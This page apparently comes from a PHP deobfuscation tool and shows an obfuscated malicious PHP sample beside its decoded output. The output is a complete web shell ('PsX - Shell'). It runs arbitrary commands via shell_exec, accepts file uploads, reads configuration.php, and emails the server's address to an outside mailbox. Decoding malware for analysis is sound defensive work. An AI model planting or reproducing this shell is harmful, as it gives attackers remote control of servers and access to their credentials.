Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @error_reporting(0); @set_time_limit(0); $agz = "rVZtT9tIEP58SP0Py14kOyrY9E536gF..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/logs/simple.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>PsX - Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="GO"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

Did this file decode correctly?

Original Code

<?php
@error_reporting(0);
@set_time_limit(0); 
$agz = "rVZtT9tIEP58SP0Py14kOyrY9E536gFBpWBKpINwcTidBMja2JtkW9tr7a6hOcR/v5ldOy+FcrRq
FCn2vD7zzOxsuFJSJYpXUhlRTv2d7t6rDTEh/qbQmhu/k8RRHPcH51femH1kn7ybbven+1cbnVuh
hUllXRrSIzvg1LnjY3hEh+Hf0fCKno5GF8npIB7RG1SL8uOaehj9dRnFo+Ry2HcGY5nNwYKyjJE5
K6cEPHhqyHWJodGfoplmE17sZBxM34lSJFNA6aEwKWTGvQX+hWGX3Hc0T2slzBzCx4cnUXI2OI4g
wODkhO49vNrguebPWJ2DkU3NVcVVDzLOpDbjeckK7i8q8txvcnh8PASampr5JyMVBPma0zA6G4yi
FaeCidynpTQB5JoAAb//8W7OZlIGqSzoFqGWKLpFT5kWOXmPXWElmRlT7YZhSxWQ1lZzXfYvSMzV
LUccTRHXJQFp3zIsFYhbqNQCf9T1pslLrh5ZvH5tSRITv52cD9HoyktzWXKcGhwaLWuV8tUx8OKj
Yf9ilJz0/4zOD88iz45CxrURpLe0Oh4cXZ5F56NkOBiMvJuAhrmc6lCLosp5UM0qHA3FHbcuyxZx
YboO9g+cm90Xzc2umxswSmeS0H0jTM4PLvQ/ZJvEM57n+6ET7Y/VAcJv7CYSjpQW//LeLySVOTTn
57f2A4YHNFgkC+h+OF44d0CY1NDbHvVpALUlIABCjBX63YB2X5rjEhwAfS2yno1UzOERIixSBJRM
l8rpl8pVWC/Kh12DhBT7mNS2h931MJO6TI2QJanuIBnBUUrvMneqUhS5wevUPW2UqqT2Ub/lhZ6d
O6vaRF3OS6vqbr9BheKmViVBSQDGbUvvV+R2qBv5Uymur78lB1h/PUmTCCnzgDJVkAKXBjB9gVuU
MMtBj9KD5wk9kkXByqwlcF+UVW2ImVe8Rw3/bChBjns0LTK6ro3rcSGWeheHkluW1/D+YQDmIQI7
8PbWgXLoj41Q1LkRFVPG2m1nzLAWeFsNFvM/FVxWuWQZORE5t1WEaP2omJnIMl42YLWDvmYwAf9G
jaOJr7TJ+dZFexbFOb+z3rtkFcRKfCTTeb/5rclT8jt8oCTNmdY9w9YcHMhGR8dmQa0reI3elUWK
jF15zrldpbX1yATu9Gp5BDY7Fkfr08ABp3ursKsXd2185bWUeDdgZ43sGBbylicuOs8SNPCfdDFF
lTg32LQLNIFN04D5IaGwWrdG2qmAC5JnuBYeiFvAZE0f12nKtSYGRMGX4WB37R4Tukce7GF7RHIz
8y3LcEQsZY2yyOz91Gy1SvHVCfq1naAd+4FdrXHNJ/wzT32MZJeaG6IQfenaZlm/NYslBNlgWCq+
F4L8Jgxq0kJQEwCAzUrsxQLecLFouGeC0H1BNBHTWjE85/Y67rYYwXn1fwP5DuBersl2zrwnsf8H";@eval(gzinflate(base64_decode($agz)));?>

Function Calls

gzinflate 1
base64_decode 1
set_time_limit 1
error_reporting 1

Variables

$agz rVZtT9tIEP58SP0Py14kOyrY9E536gFBpWBKpINwcTidBMja2JtkW9tr7a6h..

Stats

MD5 6eb7435983f3c694c6c18a9c2fd7387c
Eval Count 1
Decode Time 92 ms